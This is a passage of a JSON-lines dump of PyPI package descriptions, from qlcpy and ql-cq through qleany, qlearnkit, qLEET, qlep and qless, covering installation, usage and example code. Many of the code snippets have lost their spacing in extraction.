filetest/sample_code.py:fromtypingimportListdeffind_first(words_list:List[str],initial:str)->int:f=Falseforiinrange(len(words_list)):ifwords_list[i].startswith(initial):returnidefcount_average()->None:s=0n=0word=NonewhilewordisNoneorword!='':word=input('Enter number or empty line to count average')try:s+=int(word)n+=1exceptValueError:print('Not a number')ifn>0:print('Average',s/n)print('No numbers')We use the CLI to create one question of each available type:% qlcpy test/sample_code.py --call 'find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")' -n 9 --unique\n Which of the following are variable names in the program? [VariableNames]\n if: A reserved word in programming language [reserved_word]\n input: A function that is built in to programming language [builtin_function]\n * n: A variable in the program [variable]\n other: This word was not used in the program [unused_word]\n * word: A variable in the program [variable]\n\n Which of the following are parameter names of the function declared on line 3? [ParameterNames]\n f: A variable in the program [variable]\n find_first: A name of the function [function]\n i: A variable in the program [variable]\n * initial: A parameter of the function [parameter]\n * words_list: A parameter of the function [parameter]\n\n A program loop starts on line 5. Which is the last line inside it? [LoopEnd]\n 4: The loop starts after this line [line_before_block]\n 6: This line is inside the loop BUT it is not the last one [line_inside_block]\n * 7: Correct, this is the last line inside the loop [last_line_inside_block]\n 8: The loop ends before this line [line_after_block]\n\n A value is accessed from variable i on line 6. On which line is i created? [VariableDeclaration]\n 4: This is a random line that does not handle the given variable [random_line]\n * 5: Correct, this is the line where the variable is created. [declaration_line]\n 6: This line references (reads or assigns) the given variable BUT it is created before [reference_line]\n 7: This line references (reads or assigns) the given variable BUT it is created before [reference_line]\n\n From which line program execution may continue to line 18? [ExceptSource]\n 13: Except-block cannot be entered from outside the corresponding try-block. [before_try_block]\n 15: At least the first line inside try-block starts executing. [try_line]\n * 16: Correct, this line can raise an error of the expected type. [source_line]\n 17: This line does NOT raise an error of the expected type. [not_source_line]\n\n Which of the following best describes the purpose of line 13? [LinePurpose]\n Accepts new data: Incorrect. [read_input]\n Guards against division by zero: Incorrect. [zero_div_guard]\n Ignores unwanted input: Incorrect. [ignores_input]\n * Is a condition for ending program: Correct. [end_condition]\n\n Which of the following best describes the role of variable sthat is created on line 10? [VariableRole]\n A fixed value that is not changed after created: Incorrect. [fixed]\n * A gatherer that combines new values to itself: Correct. [gatherer]\n A stepper that systematically goes through evenly spaced values: Incorrect. [stepper]\n The variable is never accessed and could be removed: Incorrect. [dead]\n\n Line 5 has a loop structure. How many times does the loop execute when running find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")? [LoopCount]\n * 4: Correct, this is the number of times the loop executed. [correct_count]\n 5: This number is off by one. [one_off_count]\n 6: This is an incorrect, random number. [random_count]\n 7: This is an incorrect, random number. [random_count]\n\n Line 5 declares a variable named i. Which values and in which order are assigned to the variable when running find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")? [VariableTrace]\n 0, 1, 2: This sequence is missing a value that was assigned to the variable. [miss_value]\n * 0, 1, 2, 3: Correct, these values were assigned in this order to the variable. [correct_trace]\n 3, 1, 0, 2: This is an incorrect, random sequence of values. [random_values]\n 3, 1, 2: This is an incorrect, random sequence of values. [random_values]Installationpip install qlcpyUsageThe package offers a CLI for test prints as well as JSON output. See the example section\nabove for example output. Below is the usage instruction from the command.% qlcpy --help\n usage: __main__.py [-h] [-m] [-c CALL] [-sc SILENT_CALL] [-i INPUT] [-n N]\n [-t TYPES [TYPES ...]] [-u] [-l LANG] [--json]\n [--list-types]\n [program]\n\n QLCpy generates questions that target analysed facts about the given program\n\n positional arguments:\n program A python program file\n\n optional arguments:\n -h, --help show this help message and exit\n -m, --main Run with \"__name__\" = \"__main__\"\n -c CALL, --call CALL A python call to execute\n -sc SILENT_CALL, --silent-call SILENT_CALL\n A python call to execute silently without including it\n in the question prompts\n -i INPUT, --input INPUT\n A text file to use as stdin\n -n N Number of questions (at maximum)\n -t TYPES [TYPES ...], --types TYPES [TYPES ...]\n Only these question types\n -u, --unique Only unique question types\n -l LANG, --lang LANG Language code for the text (en, fi)\n --json Print question data as JSON\n --list-types List available question typesFor programmatic integration the library offers ageneratefunction that offers the same generation options as the CLI command. Type hints are\nincluded andmodels.pydescribes the input and output data. Below\nis an example python program using the library.importqlcpywithopen('test/sample_code.py','r')asf:src=f.read()qlcs=qlcpy.generate(src,[qlcpy.QLCRequest(1,types=['LoopCount','VariableTrace']),qlcpy.QLCRequest(10,fill=True,unique_types=True),],call='find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")',)forqlcinqlcs:print(f'{qlc.question}={\", \".join(str(o.answer)foroinqlc.optionsifo.correct)}')importjsonprint(json.dumps(list(qlc.to_dict()forqlcinqlcs)))"} +{"package": "ql-cq", "pacakge-description": "CQCode quality checker packageUsageCheckingJust runcqin the root of your package.$ cq\nrequirements_setup_compatibility\nsetup.py: setup.py: does not contain requirement 'coverage' that is in requirements.txt\ndumb_style_checker\nsetup.py:20: Put exactly one space before and after `=` [... name='.........', ...].\npackage/api.py:191: Put exactly one space before and after `=` [... def fake_localtime(t=None): ...].\npyflakes-ext\nHint: use `# NOQA` comment for disabling pyflakes on particular line\n./tests/test_warnings.py:4: 'types' imported but unused\nmypy\nHint: use `# type: ignore` for disabling mypy on particular line\npackage/api.py:42: error: Need type annotation for 'freeze_factories' (hint: \"freeze_factories: List[] = ...\")\npylint\nHint: use `# pylint: disable=` for disabling line check. For a list of violations, see `pylint --list-msgs`\npackage/api.py:56: [W0212(protected-access), ] Access to a protected member _uuid_generate_time of a client classYou can specify path to packages that you want to test, if you want to test whole library/app.$ cq package_1 package_2Checkers are run in threads. Some of them (e.g. pylint, mypy) spawn an external process so this checkers run in parallel.To disable certain checker for the whole run add option-d:$ cq -d pylint -d branch_name_checkWarnings are hidden by default. To display them, run cq with--show-warnings$ cq --show-warningsIf something takes too long use debug output, which will print timing for each checker:$ cq --debugMost of the checkers support disabling the error in the comment on the respective line. For example inpylintyou can use# pylint: disable = protected-accessto disable protected access check in the current context.FixingJust runcq --fixwith the same options as regularcq.Checkerspylint- comprehensive lintermypy- checks python typingpyflakes-ext- another general lintergrammar_nazi- grammar/spelling errorsdumb_style_checker- basic python mistakes (e.g. use of print in a library)requirements_setup_compatibility- validation of version compatibility between setup.py and requirements.txtrequirements-validator- requirements.txt validationsetup_check- setup.py validatorbranch_name_check- check whether current branch name comply with Quantlane standardsorange- code formatter based onblackisort- isort your imports, so you don't have tosafety- checks installed dependencies for known security vulnerabilitiesFixersorange- code formatter based onblackisort- isort your imports, so you don't have topylintYou can override the packaged pylint rules in.pylintrcin the root of your project (actually in$PWD/.pylintrcforcqrun)Pylint checker can output two types of issues: warning and error. Errors are in bold typeset. Warnings can (but should not) be ignored.mypyConfig can be overridden by havingmypy.iniin the root of your project"} +{"package": "qlda", "pacakge-description": "UNKNOWN"} +{"package": "qldailycheckin", "pacakge-description": "No description available on PyPI."} +{"package": "qldb-orm", "pacakge-description": "makpar-innolabqldb-ormA simpleObject-Relation-Mappingfor a serverlessAWS Quantum Ledger Databasebackend, and a command line utility for querying tables on those ledgers.NOTE: The user or process using this library must have anIAM policy that allows access to QLDB.ORMThe idea behind theORMis to map document fields to native Python object attributes, so that document values can be accessed by traversing the object property tree.CRUD OPERATIONSfromqldb_orm.qldbimportDocument# Create a document on `my_table` table.document=Document('my_table')document.field={'nested_data':{'array':['colllection','of','things']}}document.save()fromqldb_orm.qldbimportDocument# Load a document from `my_table` table.document=Document('my_table',id=\"123456\")forvalindocument.field.nested_data.array:print(val)Queriesfromqldb_orm.qldbimportQueryquery=Query('my-table').find_by(field_name='field value')fordocumentinquery:print(f'Document({document.id}).field_name ={document.field_name}')CLICRUD Operationsqldb-orm--tableyour-table--insertcol1=val1col2=val2...\nqldb-orm--tableyour-table--id123--updatecol1=newval1col2=newval2Queriesqldb-orm--tableyour-table--findcolumn=thisRead The Docsqldb-orm documentationCode Quality"} +{"package": "qldbshell", "pacakge-description": "Amazon QLDB ShellThis tool provides an interface to send PartiQL statements toAmazon Quantum Ledger Database (QLDB).\nThis tool is not intended to be incorporated into an application or adopted for production purposes.\nThe objective of the tool is to give developers, devops, database administrators, and anyone else interested the opportunity for rapid experimentation with QLDB andPartiQL.PrerequisitesBasic ConfigurationSeeAccessing Amazon QLDBfor information on connecting to AWS.Python 3.4 or laterThe shell requires Python 3.4 or later. Please see the link below for more detail to install Python:Python InstallationGetting StartedInstall the QLDB Shell using pip:pip3 install qldbshellInvocationThe shell can then be invoked by using the following command:$qldbshell--region--ledgerAn example region code that can be used is us-east-1.\nThe currently avaiable regions are addressed in theQLDB General Referencepage.\nBy default, the shell will use the credentials specified as environment variables and then in the default profile mentioned in~/.aws/credentials/(default location set in the AWS_SHARED_CREDENTIALS_FILE environment variable) and then the default profile in~/.aws/config(default location set in AWS_CONFIG_FILE environment variable).\nVarious optional arguments can be added to override the profile, endpoints, and region used. To view the arguments, execute the following:$qldbshell--helpExample UsageAssuming that the ledger, \"test-ledger\" has already been created:$qldbshell--regionus-east-1--ledgertest-ledger\nqldbshell>CREATETABLETestTable\nqldbshell>INSERTINTOTestTable`{\"Name\":\"John Doe\"}`qldbshell>SELECT*FROMTestTable\nqldbshell>exitWe use backticks in the example above since we use are using Ion literals. For more on querying Ion literals, gohere.\nEach statement except exit is considered as a transaction.See alsoAmazon QLDB accepts and storesAmazon IONDocuments. Amazon Ion is a richly-typed, self-describing, hierarchical data serialization format offering interchangeable binary and text representations. For more information read theION docs.Amazon QLDB supports thePartiQLquery language. PartiQL provides SQL-compatible query access across multiple data stores containing structured data, semistructured data, and nested data. For more information read thePartiQL docs.We use backticks in our example since we use are using Ion literals. For more on querying Ion with PartiQL, gohere.DevelopmentSetting up the ShellClone the repository using:git clone --recursive https://github.com/awslabs/amazon-qldb-shell.gitAfter cloning the repository, activate a virtual environment and install the package by running:$virtualenvvenv\n...\n$.venv/bin/activate\n$pip3install-rrequirements.txt\n$pip3install-e.LicenseThis tool is licensed under the Apache 2.0 License."} +{"package": "qldebugger", "pacakge-description": "Queue Lambda DebuggerUtility to debug AWS lambdas with SQS messages."} +{"package": "ql-demo", "pacakge-description": "UNKNOWN"} +{"package": "qldev", "pacakge-description": "No description available on PyPI."} +{"package": "qLDPC", "pacakge-description": "qLDPCThis package contains tools for constructing and analyzingquantum low density partity check (qLDPC) codes.\ud83d\udce6 InstallationThis package requires Python>=3.10, and can be installed from PyPI withpip install qldpcTo install a local version from source:git clone git@github.com:Infleqtion/qLDPC.git\npip install -e qLDPCYou can alsopip install -e 'qLDPC[dev]'to additionally install some development tools.\ud83d\ude80 FeaturesNotable features include:abstract.py: module for basic abstract algebra (groups, algebras, and representations thereof).ClassicalCode: class for representing classical linear error-correcting codes over finite fields.QuditCode: general class for constructingGalois-qudit codes.CSSCode: general class for constructingquantum CSS codesout of two mutually compatibleClassicalCodes.CSSCode.get_logical_ops: method to construct a complete basis of nontrivial logical operators for aCSSCode.CSSCode.get_distance: method to compute the code distance (i.e., the minimum weight of a nontrivial logical operator) of aCSSCode. Includes options for computing a lower bound (determined by the distances of the underlyingClassicalCodes), an upper bound (with the method ofarXiv:2308.07915), and the exact code distance (with an integer linear program).Includes options for applying local Hadamard transforms, which is useful for tailoring aCSSCodeto biased noise (seearXiv:2202.01702). Options to apply more general Clifford code deformations are pending.GBCode: class for constructinggeneralized bicycle codes, as described inarXiv:1904.02703.QCCode: class for constructing thequasi-cyclic codesinarXiv:2308.07915.HGPCode: class for constructinghypergraph product codesout of twoClassicalCodes.LPCode: class for constructinglifted product codesout of two protographs (i.e., matrices whose entries are elements of a group algebra). SeearXiv:2012.04068andarXiv:2202.01702.QTCode: class for constructingquantum Tanner codesout of (a) two symmetric subsetsAandBof a groupG, and (b) twoClassicalCodes with block lengths|A|and|B|. SeearXiv:2202.13641andarXiv:2206.07571.\ud83e\udd14 Questions and issuesIf this project gains interest and traction, I'll add a documentation webpage and material to help users get started quickly. I am also planning to write a paper that presents and explains this project. In the meantime, you can explore the documentation and explanations in the source code.qldpc/codes_test.pycontains some examples of using the classes and methods described above.If you have any questions, feedback, or requests, pleaseopen an issue on GitHubor email me atmichael.perlin@infleqtion.com!\u2693 AttributionIf you use this software in your work, please cite with:@misc{perlin2023qldpc,\n author = {Perlin, Michael A.},\n title = {{qLDPC}},\n year = {2023},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/Infleqtion/qLDPC}},\n}This may require adding\\usepackage{url}to your LaTeX file header. Alternatively, you can citeMichael A. Perlin. qLDPC. https://github.com/Infleqtion/qLDPC, 2023."} +{"package": "qleany", "pacakge-description": "Qleany - Clean Architecture Framework for C++/Qt6 ProjectsQleany is a streamlined framework designed to integrate Clean Architecture principles within C++ Qt6 applications. It is built on three core components:Qleany C++/Qt Library: Provides a range of common and generic tools and classes essential for implementing Clean Architecture in C++/Qt projects.Python/Jinja2 Project Structure Generator: Features a dedicated user interface developed using PySide. This generator facilitates the creation of a structured project environment based on the principles of Clean Architecture.Examples and Documentation: A collection of examples to guide users in implementing the framework effectively.Important NoticesPlease avoid using Qt Design Studio version 4.3 (which utilizes Qt 6.6) due to a known issue that impacts Qt versions 6.5.3 and 6.6. This bug can cause crashes in previews (qml2puppet) when working with QML mocks generated by Qleany. We recommend using Qt Design Studio LTS version 4.1 instead, as it is based on Qt 6.5.1 and does not exhibit this problem. Qt Design Studio 4.4 preview seems to run well with Qleany.Framework's ObjectiveQleany's primary goal is to automate the generation of a structured project environment for C++/Qt6 applications. This is achieved by interpreting a simple manifest file, namedqleany.yaml, located at the root of the project. The framework generates a comprehensive structure including folders, CMakeLists.txt, and essential C++ files. The generated projects support both QWidget and QML GUIs or a combination of both. Upon initial generation, the projects are immediately compilable, requiring developers only to design GUIs and implement custom use cases.The framework acknowledges the repetitive nature of file creation in Clean Architecture and addresses this by automating the generation of similar files. Additional features include:An asynchronous undo-redo system based on the command pattern.A SQLite-based database layer for data persistence.Support for custom use cases with user-defined DTOs (Data Transfer Objects) for inputs and outputs.The ability to define both soft and hard relationships between entities, including one-to-one and one-to-many (unordered or ordered) associations.Entities within the framework handle cascade deletion. Additionally, the implementation of soft-deletion (recoverable trash binning) is currently in progress.Framework StructureMany developers are likely familiar with the following depiction of Clean Architecture:It's important to note that this conceptual representation needs to be tailored to fit the specific requirements of the language and project at hand. Qleany presents a distinct interpretation of Clean Architecture, uniquely adapted and structured to suit its specific use cases and environment.Domain: Contains entities and is encapsulated in a library nameddomain.Application: Groups use cases by functionalities, organized within a library calledapplication.Persistence: Manages internal data persistence. It includes a 'repository' wrapper for SQLite database interactions, with each entity having its repository in theRepositoryProviderclass.Contracts: A common library for most other components, housing all interfaces frompersistence,gateway, andinfrastructure. This design minimizes tight coupling and circular dependencies.DTO Libraries: Each functionality has its DTO library, facilitating communication with theapplicationlayer. DTOs are used for both input and output in interactions with the outer layers, such as interactors.Gateway: Optional library for handling remote connections and services. It can be manually added by the developer and is used similarly to repositories in use cases.Infrastructure: Optional. Handles actions like file management, local settings, and system queries. It's injected into use cases similar to repositories and gateways.Interactor: Acts as an internal API to invoke use cases, streamlining the interaction between the user interface and application logic.Presenter: Maintains Qt models and representations of unique entities (referred to asSingles), enhancing their integration and usage within the GUI.Registration: Each component (persistence,gateway,infrastructure,interactor) initializes its classes in a correspondingname_registration.cpp file, typically called together in the main.cpp.Project dependencies:Example of project structure:Utilizing the Qleany GUI InterfaceQleany tooling can be installed usingpip install qleany.To access Qleany's user-friendly graphical interface, runqleanyin a terminal. This interface allows developers to efficiently manage file generation. This is the recommended way to generate files.Run the Qleany GUI:Launch Qleany's graphical user interface by executing the scriptgenerator/qleany_generator_ui.py.Select theqleany.yamlFile:Begin by choosing your project'sqleany.yamlfile. This configuration file is essential for the GUI to operate correctly.List Available Files:In the GUI, use the \"list\" button for each component. This will generate a list of files that can be created for that component.Select Files to Generate:Choose the files you want to generate from the provided list, depending on your project requirements.Preview Files:Opt for the \"preview\" feature to generate and inspect the selected files in a \"preview\" folder. The location of this folder is defined in yourqleany.yamlfile.Generate Files:After previewing, proceed to generate the files by clicking the \"generate\" button. This will create the files in their designated locations within your project.Overwrite Confirmation:Should the file generation process require overwriting existing files, a warning message will appear. This alert ensures you are informed about and agree to the upcoming changes to your current files.Alternatively, you can list and generate all the files of the project.Qleany YAML Configuration RulesTheqleany.yamlfile is the core configuration file for the Qleany framework. A working example can be foound inexample/simple/qleany.yaml. Below are the rules and structure for defining the configuration:Global Settingsglobal:application_name:SimpleExampleapplication_cpp_domain_name:Simpleorganisation:name:simpleexampledomain:qleany.euEntities DefinitionDefines entities and their properties. Setting parent to EntityBase (provided by Qleany) offers the \"id\" field of type \"int\". It's mandatory to use EntityBase as heritage.entities:list:-name:EntityNameparent:ParentEntityonly_for_heritage:true/falsefields:# basic:-type:DataTypename:fieldNamehidden: true/false (default:false)# one-to-one relationship:-type:OtherEntityNamename:fieldNamestrong:true/falsehidden: true/false (default:false)# one-to-many relationship:-type:QListname:fieldNamestrong:true/falseordered:true/falsehidden: true/false (default:false)# other fields ...# other entitiesexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hfolder_path:path/to/entity/folderRepositories ConfigurationSpecifies settings for entity repositories.repositories:list:-entity_name:EntityNamelazy_loaders:true/false# other repositories, typically one for each entityinterface_path:path/to/interfaceexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hrepository_folder_path:path/to/repository/folderbase_folder_path:path/to/base/folderInteractor SettingsConfigures interactor-specific settings.interactor:folder_path:path/to/interactor/folderexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hcreate_undo_redo_interactor:true/falseApplication Layer ConfigurationDefines application-specific settings and CRUD operations.application:common_cmake_folder_path:path/to/application/folderfeatures:-name:FeatureNameDTO:dto_identical_to_entity:enabled:true/falseentity_mappable_with:EntityNameCRUD:enabled: true/false (default:false)entity_mappable_with:EntityNameget:enabled:true/falseget_all:enabled:true/falseget_with_details:enabled:true/falsecreate:enabled:true/falseremove:enabled:true/falseupdate:enabled:true/falseinsert_relation:enabled:true/falseremove_relation:enabled:true/falsecommands:-name:CommandNameentities:-EntityNamevalidator:enabled:true/falseundo:true/falsedto:in:enabled: true/false (default:true)type_prefix:CommandNamefields:-type:DataTypename:fieldNameout:enabled: true/false (default:true)type_prefix:CommandNameReplyfields:-type:DataTypename:fieldNamequeries:-name:QueryNameentities:-EntityNamevalidator:enabled:true/falseundo:false (useless for queries)dto:in:enabled: true/false (default:true)type_prefix:QueryNamefields:-type:DataTypename:fieldNameout:type_prefix:QueryNameReplyfields:-type:DataTypename:fieldNameDTOs (Data Transfer Objects) ConfigurationDTOs:common_cmake_folder_path:path/to/dtos/folderContracts ConfigurationDefines settings for contracts in the application.contracts:inverted_app_domain:domain.identifierfolder_path:path/to/contracts/folderexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hPresenter SettingsConfigures presenter-specific settings. Note: thenamecan be set toautopresenter:folder_path:path/to/presenter/folderexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hcreate_undo_and_redo_singles:true/false (default false)singles:-name:SingleName (or \"auto\")entity:EntityNameread_only: true/false (default:false)# Additional singles...list_models:-name:ListModelName (or auto)entity:EntityNamedisplayed_field:fieldNamein_relation_of:RelationEntityrelation_field_name:relationFieldNameread_only: true/false (default:false)# Additional list models...QML ConfigurationSpecifies paths for QML folder. The folders mock_imports and real_imports will be created in it.qml:folder_path:path/to/qml/folderMIT LicenseCopyright (c) 2023 Cyril JacquetPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qlearning", "pacakge-description": "No description available on PyPI."} +{"package": "qlearnkit", "pacakge-description": "Qlearnkit python libraryQlearnkit is a simple python library implementing some fundamental Machine Learning models and algorithms for a gated quantum computer, built on top ofQiskitand, optionally,Pennylane.InstallationWe recommend installingqlearnkitwith pippipinstallqlearnkitNote:pip will install the latest stable qlearnkit.\nHowever, the main branch of qlearnkit is in active development. If you want to test the latest scripts or functions please refer todevelopment notes.Optional InstallVia pip, you can installqlearnkitwith the optional extension\npackages dependent onpennylane. To do so, runpipinstallqlearnkit['pennylane']Docker ImageYou can also use qlearnkit via Docker building the image from the providedDockerfiledockerbuild-tqlearnkit-fdocker/Dockerfile.then you can use it like thisdockerrun-it--rm-v$PWD:/tmp-w/tmpqlearnkitpython./script.pyGetting started with QlearnkitNow that Qlearnkit is installed, it's time to begin working with the Machine Learning module.\nLet's try an experiment using the QKNN Classifier algorithm to train and test samples from a\ndata set to see how accurately the test set can be classified.fromqlearnkit.algorithmsimportQKNeighborsClassifierfromqlearnkit.encodingsimportAmplitudeEncodingfromqiskitimportBasicAerfromqiskit.utilsimportQuantumInstance,algorithm_globalsfromqlearnkit.datasetsimportload_irisseed=42algorithm_globals.random_seed=seedtrain_size=32test_size=8n_features=4# all features# Use iris data set for training and test dataX_train,X_test,y_train,y_test=load_iris(train_size,test_size,n_features)quantum_instance=QuantumInstance(BasicAer.get_backend('qasm_simulator'),shots=1024,optimization_level=1,seed_simulator=seed,seed_transpiler=seed)encoding_map=AmplitudeEncoding(n_features=n_features)qknn=QKNeighborsClassifier(n_neighbors=3,quantum_instance=quantum_instance,encoding_map=encoding_map)qknn.fit(X_train,y_train)print(f\"Testing accuracy: \"f\"{qknn.score(X_test,y_test):0.2f}\")DocumentationThe documentation is availablehere.Alternatively, you can build and browse it locally as follows:first make sure to havepandocinstalledsudoaptinstallpandocthen runmakedocthen simply opendocs/_build/index.htmlwith your favourite browser, e.g.bravedocs/_build/index.htmlDevelopment notesAfter cloning this repository, create a virtual environmentpython3-mvenv.venvand activate itsource.venv/bin/activatenow you can install the requirementspipinstall-rrequirements-dev.txtnow run the testsmaketestMake sure to runpre-commitinstallto set up the git hook scripts. Nowpre-commitwill run automatically ongit commit!AcknowledgmentsThe Quantum LSTM model is adapted from thisarticlefrom Riccardio Di Sipio, but the Quantum part\nhas been changed entirely according to the architecture described in thispaper."} +{"package": "qleda", "pacakge-description": "QLEDAQLEDA is a python project to read or create schematics and netlists.\nThe data model uses the popular frameworkSQLAlchemy.\nTherfore the created data can be stored in either aPostgreSQLdatabase or in aSQLitedatabase.Coding RulesIn generalPython Style Guide PEP 8should be respected.SQL Alchemyrelationship:If files are on the same hierarchy (same package) use 'back_populates' wherever possible since it improves code\nreadability.\nIf a package/class e.g. 'B' depends on package 'A' but 'A' not on 'B', use 'backref' in order to avoid unnecessary\ndependencies.Table namesTable names shall be lowercase of the Class name with an underscore. It's allowed to shorten the name where it makes sense.FileStructurecommon/TBDcore/all basic functionalities are heredrawing/everything related to graphical representationpypads/importer function to read library and schemtic data from PADS Logic ascii files.TestingAdd unittests in a subfolder namedtest. Name every unittest filetest_+file_to_test.\nTo run all tests run:python-munittestdiscover-t./-sqleda/from the project base directory.SetupAt least Python 3.9 is required.\nInstallrequirements.txt."} +{"package": "qleet", "pacakge-description": "qLEETis an open-source library for exploringLoss landscape,Expressibility,Entangling capabilityandTraining trajectoriesof noisy parameterized quantum circuits.Key FeaturesWill supportQiskit\u2019s,Cirq\u2019sandpyQuil'squantum circuitsandnoise models.Provides opportunities to improve existing algorithms likeVQE,QAOAby utilizing intuitive insights from the ansatz capability and structure of loss landscape.Facilitate research in designing new hybrid quantum-classical algorithms.InstallationqLEET requires Python version 3.7 and above. Installation of qLEET, as well as all its dependencies, can be done using pip:python -m pip install qleetExamplesProperties of an AnsatzAnsatzExpressibility and Entanglement SpectrumSolving MAX-CUT using QAOAProblem GraphLoss Landscape and Training TrajectoriesContributing to qLEETWe love your input! We want to make contributing to this project as easy and transparent as possible, whether it's:Reporting a bugSubmitting a fixProposing new featuresFeel free to open an issue on this repository or add a pull request to submit your contribution. Adding test cases for any contributions is a requirement for any pull request to be mergedFinancial SupportThis project has been supported byUnitary Fund.LicenseqLEET isfreeandopen source, released under the Apache License, Version 2.0.ReferencesExpressibility and Entangling Capability of Parameterized Quantum Circuits for Hybrid Quantum\u2010Classical Algorithms, Sim, S., Johnson, P. D., & Aspuru\u2010Guzik, A. Advanced Quantum Technologies, 2(12), 1900070. Wiley. (2019)Visualizing the Loss Landscape of Neural Nets, Hao Li, Zheng Xu, Gavin Taylor, Christoph Studer, Tom Goldstein, NIPS 2018, arXiv:1712.09913 [cs.LG] (2018)"} +{"package": "qlep", "pacakge-description": "Quantum Leader Election Protocols (QLEP)DescriptionThe current project propose a template for developing and testing quantum leader election protocols. Most of the research protocols are implemented and can be compared with new proposals.\nThe scope of the project is to contain all the protocols in a single repository and to be able to compare them on the same benchmarks.InstallpipinstallqlepUse of AWS providerFollow instructionshttps://aws.amazon.com/blogs/quantum-computing/setting-up-your-local-development-environment-in-amazon-braket/exportAWS_ACCESS_KEY_ID=YOUR_AWS_ACCESS_KEY_IDexportAWS_SECRET_ACCESS_KEY=YOUR_AWS_SECRET_ACCESS_KEYexportAWS_DEFAULT_REGION=us-west-1Use of IBM providerFollow instructionshttps://github.com/Qiskit/qiskit-ibm-providerfromqiskit_ibm_providerimportIBMProviderIBMProvider.save_account('YOUR_IBM_TOKEN')Latex for plotssudoapt-getinstall-ytexlive-latex-base\nsudoapt-getinstall-ytexlive-latex-extra\nsudoapt-getinstall-ydvipng\nsudoapt-getinstall-ycm-superUsageimportqlepqdp=qlep.core.QuantumDataProvider(provider=qlep.core.Provider.AER,backend_name=\"aer_simulator\")committee=qlep.core.CommitteeType.ALL.get_committee(no_nodes=8,committee_size=8)current_qlep=qlep.ecc.WalshQLEP(no_nodes=8,no_elections=10,quantum_data_provider=qdp,committee=committee)current_qlep.generate_quantum_data()current_qlep.simulate_elections()# only if latex is installedcurrent_qlep.draw_boxplot(simulate_file_name=current_qlep.get_simulate_file_name(),draw_directory=\"plots\")Test your proposed protocolimportqlep# numpyimportnumpyasnp# qiskitimportqiskit# override decoratorfromtyping_extensionsimportoverrideclassNQLEP(qlep.core.QuantumLeaderElectionProtocolwithPoS):r\"\"\"An example class for a dummy quantum leader election protocol\"\"\"def__init__(self,no_nodes:int,no_elections:int=1,quantum_data_provider:qlep.core.QuantumDataProvider=None,committee:qlep.core.Committee=None,)->None:super().__init__(election_type=qlep.core.ElectionType.NEWPROTOCOL,no_nodes=no_nodes,no_elections=no_elections,quantum_data_provider=quantum_data_provider,committee=committee)@overridedefget_quantum_circuits(self,measure:bool=True)->list[qiskit.QuantumCircuit]:return[NQLEPStateGenerator.get_quantum_circuits(no_nodes=self.quantum_no_nodes,measure=measure)]@overridedefget_leader_election_algorithm(self)->qlep.core.LeaderElectionAlgorithm:returnNQLEPLeaderElectionAlgorithm()@overridedefget_malicious_attacker(self)->qlep.core.MaliciousAttacker:returnNQLEPMaliciousAttacker()classNQLEPStateGenerator:@staticmethoddefget_quantum_circuits(no_nodes:int,measure:bool=True)->qiskit.QuantumCircuit:# the number of qubitsno_qubits=no_nodes# the qubits registerquantum_registers=qiskit.QuantumRegister(no_qubits,'q')ifmeasure:# the classic registersclassic_registers=qiskit.ClassicalRegister(no_qubits,'c')# the quantum circuit which use the qubits# and the classic bits registersquantum_circuit=qiskit.QuantumCircuit(quantum_registers,classic_registers)else:quantum_circuit=qiskit.QuantumCircuit(quantum_registers)# create the superposition for the first two qubitsquantum_circuit.h(quantum_registers[0])quantum_circuit.cx(quantum_registers[0],quantum_registers[1])quantum_circuit.x(quantum_registers[0])quantum_circuit.barrier()ifmeasure:quantum_circuit.measure(quantum_registers,classic_registers)returnquantum_circuitclassNQLEPLeaderElectionAlgorithm(qlep.core.LeaderElectionAlgorithm):def__init__(self)->None:super().__init__()@overridedefelect(self,data:np.ndarray)->int:match(data[0,0,0],data[0,0,1]):case(1,0):return0case(0,1):return1case_:return-1classNQLEPMaliciousAttacker(qlep.core.MaliciousAttacker):def__init__(self)->None:super().__init__()@overridedefattack(self,register_ids:np.ndarray,data:np.ndarray,malicious_ids:np.ndarray)->np.ndarray:# get the malicious nodesmalicious_nodes=[xforxinregister_idsifxinmalicious_ids]# if no malicious nodes under our control than return the given dataifnotmalicious_nodes:returndata# init return datamodified_data=np.copy(data)# verify if the first two nodes are maliciousmatch(register_ids[0]inmalicious_ids,register_ids[1]inmalicious_ids):case(True,False):modified_data[0,0,0]=1case(False,True):modified_data[0,0,1]=1case(True,True):modified_data[0,0,0]=1modified_data[0,0,1]=0case_:passreturnmodified_dataCreditsList of colaborators:Stefan-Dan CiocirlanDumitrel LoghinLicenseDistributed under the EUPL v1.2 License. SeeLICENSE.txtfor more information."} +{"package": "qless-py", "pacakge-description": "Redis-based queue management, with heartbeating, job tracking,\nstats, notifications, and a whole lot more."} +{"package": "qless-util", "pacakge-description": "Utilities for qless."} +{"package": "qless-with-throttles", "pacakge-description": "Fork of seomoz/qless-py with support for throttles."} +{"package": "qlet", "pacakge-description": "qletThis is an extension package based onflet, which provides a variety oflayoutsthat can auto-resize based on 